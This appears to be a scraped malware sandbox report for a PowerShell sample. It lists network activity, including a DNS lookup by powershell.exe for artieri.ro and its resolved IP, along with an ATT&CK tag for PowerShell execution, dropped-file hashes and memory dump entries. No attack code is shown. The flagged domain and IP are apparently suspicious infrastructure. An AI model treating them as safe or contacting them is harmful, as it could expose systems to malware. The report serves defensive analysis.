GET https://tse1.mm.bing.net/th?id=OADD2.10239340418584_19MU177BXG1FCVM1K&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239398629832_1AECK4YD8K87JKVB5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

artieri.ro

dns

powershell.exe

56 B
72 B
1
1

DNS Request

artieri.ro

DNS Response

89.44.138.129
8.8.8.8:53

129.138.44.89.in-addr.arpa

dns

72 B
95 B
1
1

DNS Request

129.138.44.89.in-addr.arpa
8.8.8.8:53

67.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

67.31.126.40.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

10.27.171.150.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

10.27.171.150.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

53.210.109.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

53.210.109.20.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

75.117.19.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

75.117.19.2.in-addr.arpa
8.8.8.8:53

79.190.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

79.190.18.2.in-addr.arpa
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.28.10

150.171.27.10

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxb5xnqa.2ry.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4576-2-0x00007FFEA9F83000-0x00007FFEA9F85000-memory.dmp

Filesize
8KB

Download
memory/4576-12-0x00000265FB950000-0x00000265FB972000-memory.dmp

Filesize
136KB

Download
memory/4576-13-0x00007FFEA9F80000-0x00007FFEAAA41000-memory.dmp

Filesize
10.8MB

Download
memory/4576-14-0x00007FFEA9F80000-0x00007FFEAAA41000-memory.dmp

Filesize
10.8MB

Download
memory/4576-17-0x00007FFEA9F80000-0x00007FFEAAA41000-memory.dmp

Filesize
10.8MB

Download
memory/4576-20-0x00007FFEA9F80000-0x00007FFEAAA41000-memory.dmp

Filesize
10.8MB

Download
memory/4576-21-0x00007FFEA9F80000-0x00007FFEAAA41000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.